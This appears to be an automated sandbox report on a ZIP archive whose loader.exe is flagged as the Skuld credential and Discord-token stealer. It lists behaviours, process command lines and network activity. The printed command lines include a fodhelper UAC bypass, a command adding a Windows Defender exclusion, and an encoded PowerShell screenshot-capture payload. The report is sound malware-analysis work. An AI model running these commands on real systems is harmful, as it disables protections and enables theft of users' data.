File name:

hoax.zip

Full analysis: https://app.any.run/tasks/42030980-690f-4f43-8188-20df68df0c63
Verdict: Malicious activity
Threats:

Stealers are a group of malicious software that are intended for gaining unauthorized access to users’ information and transferring it to the attacker. The stealer malware category includes various types of programs that focus on their particular kind of data, including files, passwords, and cryptocurrency. Stealers are capable of spying on their targets by recording their keystrokes and taking screenshots. This type of malware is primarily distributed as part of phishing campaigns.

Malware Trends Tracker     >>>
Analysis date: March 05, 2025, 13:37:19
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
skuld
uac
evasion
discord
screenshot
arch-doc
discordgrabber
generic
stealer
susp-powershell
ims-api
crypto-regex
upx
ip-check
golang
Indicators:
MIME: application/zip
File info: Zip archive data, at least v1.0 to extract, compression method=store
MD5:

E5C93D25B55E2FC948799368A5621394

SHA1:

4C77DAC34C70CE7D6668A5DA2795C7030D70C401

SHA256:

0EA23E3B55E9D41AE22EF7C7CAEA14D570572740B178B968D11BB504D23C2E37

SSDEEP:

98304:7U8jBJAWbMdpcX2vTnAYeM++6tGERSoeT55XyRRAbNEt0tuKS0br8wLVTESQ4p1a:m3a3ZLcy9

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • SKULD has been detected

      • loader.exe (PID: 7804)
      • loader.exe (PID: 8028)
      • loader.exe (PID: 8028)

    • Bypass User Account Control (fodhelper)

      • fodhelper.exe (PID: 7972)

    • Actions looks like stealing of personal data

      • loader.exe (PID: 8028)

    • Adds path to the Windows Defender exclusion list

      • loader.exe (PID: 8028)

    • Steals credentials from Web Browsers

      • loader.exe (PID: 8028)

    • Changes powershell execution policy (Bypass)

      • loader.exe (PID: 8028)

    • Changes antivirus protection settings for downloading files from the Internet (IOAVProtection)

      • powershell.exe (PID: 7520)

    • Changes Controlled Folder Access settings

      • powershell.exe (PID: 7520)

    • Changes settings for checking scripts for malicious actions

      • powershell.exe (PID: 7520)

    • Changes settings for reporting to Microsoft Active Protection Service (MAPS)

      • powershell.exe (PID: 7520)

    • Changes settings for sending potential threat samples to Microsoft servers

      • powershell.exe (PID: 7520)

    • Bypass execution policy to execute commands

      • powershell.exe (PID: 3008)

    • SKULD has been detected (YARA)

      • loader.exe (PID: 8028)

    • DISCORDGRABBER has been detected (YARA)

      • loader.exe (PID: 8028)

    • Changes settings for real-time protection

      • powershell.exe (PID: 7520)

    • Changes settings for protection against network attacks (IPS)

      • powershell.exe (PID: 7520)

  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • loader.exe (PID: 7804)

    • Uses ATTRIB.EXE to modify file attributes

      • loader.exe (PID: 8028)

    • Uses WMIC.EXE to obtain a list of video controllers

      • loader.exe (PID: 8028)

    • Checks for external IP

      • loader.exe (PID: 8028)
      • svchost.exe (PID: 2196)

    • Executable content was dropped or overwritten

      • loader.exe (PID: 8028)
      • csc.exe (PID: 6300)

    • Uses WMIC.EXE to obtain Windows Installer data

      • loader.exe (PID: 8028)

    • Uses WMIC.EXE to obtain CPU information

      • loader.exe (PID: 8028)

    • Accesses product unique identifier via WMI (SCRIPT)

      • WMIC.exe (PID: 7760)
      • WMIC.exe (PID: 5384)

    • Accesses video controller name via WMI (SCRIPT)

      • WMIC.exe (PID: 8140)
      • WMIC.exe (PID: 4988)

    • Script adds exclusion path to Windows Defender

      • loader.exe (PID: 8028)

    • Starts POWERSHELL.EXE for commands execution

      • loader.exe (PID: 8028)

    • Uses WMIC.EXE to obtain operating system information

      • loader.exe (PID: 8028)

    • Accesses operating system name via WMI (SCRIPT)

      • WMIC.exe (PID: 1660)

    • Uses NETSH.EXE to obtain data on the network

      • loader.exe (PID: 8028)

    • Base64-obfuscated command line is found

      • loader.exe (PID: 8028)

    • BASE64 encoded PowerShell command has been detected

      • loader.exe (PID: 8028)

    • The process bypasses the loading of PowerShell profile settings

      • loader.exe (PID: 8028)

    • CSC.EXE is used to compile C# code

      • csc.exe (PID: 6300)

    • Captures screenshot (POWERSHELL)

      • powershell.exe (PID: 3008)

    • Script disables Windows Defender's IPS

      • loader.exe (PID: 8028)

    • Script disables Windows Defender's real-time protection

      • loader.exe (PID: 8028)

    • There is functionality for taking screenshot (YARA)

      • loader.exe (PID: 8028)

    • There is functionality for capture public ip (YARA)

      • loader.exe (PID: 8028)

    • Possible usage of Discord/Telegram API has been detected (YARA)

      • loader.exe (PID: 8028)

    • Found regular expressions for crypto-addresses (YARA)

      • loader.exe (PID: 8028)

  • INFO

    • Reads the software policy settings

      • BackgroundTransferHost.exe (PID: 8124)

    • Checks proxy server information

      • BackgroundTransferHost.exe (PID: 8124)

    • Reads security settings of Internet Explorer

      • BackgroundTransferHost.exe (PID: 8124)
      • BackgroundTransferHost.exe (PID: 7852)
      • BackgroundTransferHost.exe (PID: 7552)
      • BackgroundTransferHost.exe (PID: 5596)
      • BackgroundTransferHost.exe (PID: 5156)
      • fodhelper.exe (PID: 7972)

    • Creates files or folders in the user directory

      • BackgroundTransferHost.exe (PID: 8124)
      • loader.exe (PID: 8028)

    • Reads the computer name

      • loader.exe (PID: 7804)

    • Checks supported languages

      • loader.exe (PID: 7804)
      • loader.exe (PID: 8028)

    • Manual execution by a user

      • loader.exe (PID: 7804)

    • Executable content was dropped or overwritten

      • WinRAR.exe (PID: 668)

    • Drops encrypted JS script (Microsoft Script Encoder)

      • loader.exe (PID: 7804)
      • loader.exe (PID: 8028)

    • Create files in a temporary directory

      • loader.exe (PID: 8028)
      • cvtres.exe (PID: 7360)
      • csc.exe (PID: 6300)

    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 5380)
      • powershell.exe (PID: 7520)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 5380)
      • powershell.exe (PID: 7520)

    • Application based on Golang

      • loader.exe (PID: 8028)

    • Detects GO elliptic curve encryption (YARA)

      • loader.exe (PID: 8028)

    • UPX packer has been detected

      • loader.exe (PID: 8028)

    • Found Base64 encoded reflection usage via PowerShell (YARA)

      • loader.exe (PID: 8028)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipRequiredVersion: 10
ZipBitFlag: -
ZipCompression: None
ZipModifyDate: 2025:03:02 11:13:22
ZipCRC: 0x00000000
ZipCompressedSize: -
ZipUncompressedSize: -
ZipFileName: config/
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
169
Monitored processes
34
Malicious processes
5
Suspicious processes
1

Behavior graph

Click at the process to see the details
start winrar.exe sppextcomobj.exe no specs slui.exe backgroundtransferhost.exe no specs backgroundtransferhost.exe backgroundtransferhost.exe no specs backgroundtransferhost.exe no specs backgroundtransferhost.exe no specs #SKULD loader.exe no specs conhost.exe no specs cmd.exe no specs fodhelper.exe no specs fodhelper.exe no specs fodhelper.exe #SKULD loader.exe conhost.exe no specs attrib.exe no specs attrib.exe no specs wmic.exe no specs svchost.exe wmic.exe no specs powershell.exe no specs wmic.exe no specs wmic.exe no specs wmic.exe no specs wmic.exe no specs netsh.exe no specs powershell.exe no specs csc.exe cvtres.exe no specs powershell.exe no specs attrib.exe no specs attrib.exe no specs slui.exe

Process information

PID
CMD
Path
Indicators
Parent process
668"C:\Program Files\WinRAR\WinRAR.exe" C:\Users\admin\AppData\Local\Temp\hoax.zipC:\Program Files\WinRAR\WinRAR.exe
explorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Exit code:
0
Version:
5.91.0
Modules
Images
c:\program files\winrar\winrar.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
1056wmic cpu get NameC:\Windows\System32\wbem\WMIC.exeloader.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
WMI Commandline Utility
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\wbem\wmic.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\framedynos.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
1660wmic os get CaptionC:\Windows\System32\wbem\WMIC.exeloader.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
WMI Commandline Utility
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\wbem\wmic.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\framedynos.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
2196C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s DnscacheC:\Windows\System32\svchost.exe
services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
2908cmd.exe /C fodhelperC:\Windows\System32\cmd.exeloader.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
3008powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeloader.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
4988wmic path win32_VideoController get nameC:\Windows\System32\wbem\WMIC.exeloader.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
WMI Commandline Utility
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\wbem\wmic.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\framedynos.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
5156"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1C:\Windows\System32\BackgroundTransferHost.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Download/Upload Host
Exit code:
1
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\backgroundtransferhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\kernel.appcore.dll
c:\windows\system32\bcryptprimitives.dll
5380powershell -Command Add-MpPreference -ExclusionPath C:\Users\admin\Desktop\loader.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeloader.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
5384wmic csproduct get UUIDC:\Windows\System32\wbem\WMIC.exeloader.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
WMI Commandline Utility
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\wbem\wmic.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\framedynos.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
Total events
27 033
Read events
26 987
Write events
43
Delete events
3

Modification events

(PID) Process:(668) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:3
Value:
C:\Users\admin\Desktop\preferences.zip
(PID) Process:(668) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:2
Value:
C:\Users\admin\Desktop\chromium_ext.zip
(PID) Process:(668) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:1
Value:
C:\Users\admin\Desktop\omni_23_10_2024_.zip
(PID) Process:(668) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:0
Value:
C:\Users\admin\AppData\Local\Temp\hoax.zip
(PID) Process:(668) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:name
Value:
120
(PID) Process:(668) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:size
Value:
80
(PID) Process:(668) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:type
Value:
120
(PID) Process:(668) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:mtime
Value:
100
(PID) Process:(7852) BackgroundTransferHost.exeKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Internet Settings\Cache\Content
Operation:writeName:CachePrefix
Value:
(PID) Process:(7852) BackgroundTransferHost.exeKey:HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Internet Settings\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
Executable files
5
Suspicious files
10
Text files
15
Unknown types
0

Dropped files

PID
Process
Filename
Type
8124BackgroundTransferHost.exeC:\Users\admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\f9a3f774-a2e5-4fc9-be75-39bcad78a36f.down_data
MD5:
SHA256:
8124BackgroundTransferHost.exeC:\Users\admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\42e2e475-53b7-4b61-8ee6-3ef9bfe4013c.f5513121-1353-4675-8839-26e7a3ce4768.down_metabinary
MD5:081BEFAB6A195F4B8A758A2FB9D1A4C0
SHA256:B6433FBE5F3D43BA325D79796F263E6698662493EC70AEF4F522BB9EAFB29152
8124BackgroundTransferHost.exeC:\Users\admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\Content\26C212D9399727259664BDFCA073966E_F9F7D6A7ECE73106D2A8C63168CDA10Dbinary
MD5:251FB99FA5BF6F5AA028D88EFCC889D9
SHA256:4EE3B4E809CB602F94F03EA0B5D1567ED609A39DE9032904F3399E3DA977BAC3
8124BackgroundTransferHost.exeC:\Users\admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\f9a3f774-a2e5-4fc9-be75-39bcad78a36f.f5513121-1353-4675-8839-26e7a3ce4768.down_metabinary
MD5:081BEFAB6A195F4B8A758A2FB9D1A4C0
SHA256:B6433FBE5F3D43BA325D79796F263E6698662493EC70AEF4F522BB9EAFB29152
5380powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_qg0spbz2.4de.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
8124BackgroundTransferHost.exeC:\Users\admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\AC\BackgroundTransferApi\42e2e475-53b7-4b61-8ee6-3ef9bfe4013c.up_meta_securebinary
MD5:9E759E2D47A836E302293962A81E4B31
SHA256:91E812EC3AEF6C816DEEE8CDFBAD4559E826BDC918F2D67DABDADB04F428DE40
3008powershell.exeC:\Users\admin\AppData\Local\Temp\wtveymdd\wtveymdd.0.cstext
MD5:C76055A0388B713A1EABE16130684DC3
SHA256:8A3CD008E86A3D835F55F8415F5FD264C6DACDF0B7286E6854EA3F5A363390E7
8028loader.exeC:\Users\admin\AppData\Local\Temp\browsers.zipcompressed
MD5:91CCE39DE82F6B8B6E3A39EE0E990AC5
SHA256:8B68EAC50D5DB06A5AB81DBA89E0E1E0008B452073D721134181D67599A0AA89
3008powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_p514l0w1.ih2.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
668WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DRb668.16364\loader.exeexecutable
MD5:D429E596E4DEB01A8160A5EE2DB2DE48
SHA256:DC16754723F3124845C7B809BB9ADF55EB4E65FC1E3636413BD82EED5D47CED7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
7
TCP/UDP connections
34
DNS requests
21
Threats
16

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
6544
svchost.exe
GET
200
2.23.77.188:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
7232
backgroundTaskHost.exe
GET
200
2.23.77.188:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAUZZSZEml49Gjh0j13P68w%3D
unknown
whitelisted
8124
BackgroundTransferHost.exe
GET
200
2.23.77.188:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D
unknown
whitelisted
8028
loader.exe
GET
200
208.95.112.1:80
http://ip-api.com/line/?fields=hosting
unknown
whitelisted
7692
SIHClient.exe
GET
200
2.16.253.202:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
7692
SIHClient.exe
GET
200
2.16.253.202:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
8028
loader.exe
GET
200
208.95.112.1:80
http://ip-api.com/json
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4.231.128.59:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:138
whitelisted
2104
svchost.exe
4.231.128.59:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:137
whitelisted
3216
svchost.exe
40.113.103.199:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
6544
svchost.exe
20.190.160.131:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
6544
svchost.exe
2.23.77.188:80
ocsp.digicert.com
AKAMAI-AS
DE
whitelisted
2112
svchost.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
7232
backgroundTaskHost.exe
20.199.58.43:443
arc.msn.com
MICROSOFT-CORP-MSN-AS-BLOCK
FR
whitelisted
7232
backgroundTaskHost.exe
2.23.77.188:80
ocsp.digicert.com
AKAMAI-AS
DE
whitelisted

DNS requests

Domain
IP
Reputation
google.com
  • 216.58.212.174
whitelisted
client.wns.windows.com
  • 40.113.103.199
whitelisted
login.live.com
  • 20.190.160.131
  • 40.126.32.68
  • 20.190.160.3
  • 40.126.32.138
  • 40.126.32.76
  • 20.190.160.132
  • 40.126.32.74
  • 20.190.160.65
whitelisted
ocsp.digicert.com
  • 2.23.77.188
whitelisted
settings-win.data.microsoft.com
  • 51.104.136.2
whitelisted
arc.msn.com
  • 20.199.58.43
whitelisted
www.bing.com
  • 92.123.104.17
  • 92.123.104.28
  • 92.123.104.13
  • 92.123.104.18
  • 92.123.104.26
  • 92.123.104.19
  • 92.123.104.11
  • 92.123.104.21
  • 92.123.104.23
whitelisted
api.ipify.org
  • 104.26.12.205
  • 172.67.74.152
  • 104.26.13.205
shared
ip-api.com
  • 208.95.112.1
whitelisted
api.gofile.io
  • 45.112.123.126
whitelisted

Threats

PID
Process
Class
Message
2196
svchost.exe
Misc activity
ET INFO External IP Lookup Domain (ipify .org) in DNS Lookup
8028
loader.exe
Misc activity
